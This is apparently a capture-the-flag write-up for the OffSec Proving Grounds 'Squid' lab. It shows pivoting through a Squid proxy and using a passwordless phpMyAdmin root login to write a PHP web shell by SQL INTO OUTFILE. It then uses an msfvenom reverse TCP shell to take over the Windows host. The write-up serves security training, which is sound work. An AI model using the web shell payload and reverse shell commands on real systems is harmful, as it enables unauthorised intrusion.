Skip to content

Latest commit

 

History

History
74 lines (51 loc) · 1.98 KB

2023-08-20-Proving_grounds_Practice-Squid.md

File metadata and controls

74 lines (51 loc) · 1.98 KB
title layout date tag writeups hidden author description
Proving grounds Practice: Squid
post
2023-08-20 06:00
CTF
Offsec labs
OSCP
Writeup
Windows
Pg-Practice
true
true
Naveen
Offsec proving grounds practice windows machine writeup

Nmap

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved

Squid http proxy service running on PORT 3128. Use Squid Pivoting Open Port Scanner to perform PORT scanning.

img

Configure the proxy server IP and PORT in the browser to access the webserver running on PORT 8080.

img

System Information

img

PHPMyadmin

img

Login with username root and password as null.

Execute below sql query to create reverse shell.

SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"

As shown in the phpinfo() page the document root folder is C:/wamp/www. So the shell will be publicly accessible at http://192.168.237.189:8080/shell2.php.

Remote Code Execution

http://192.168.237.189:8080/shell2.php?cmd=whoami

img

Obtain Stable Shell using msfvenom

msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe

Use curl to download the shell in to the attacking machine. Run a nc llisterner and execute the reverse shell by visiting http://192.168.237.189:8080/shell2.php?cmd=mshell.exe

img

Reverse shell obtained.

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.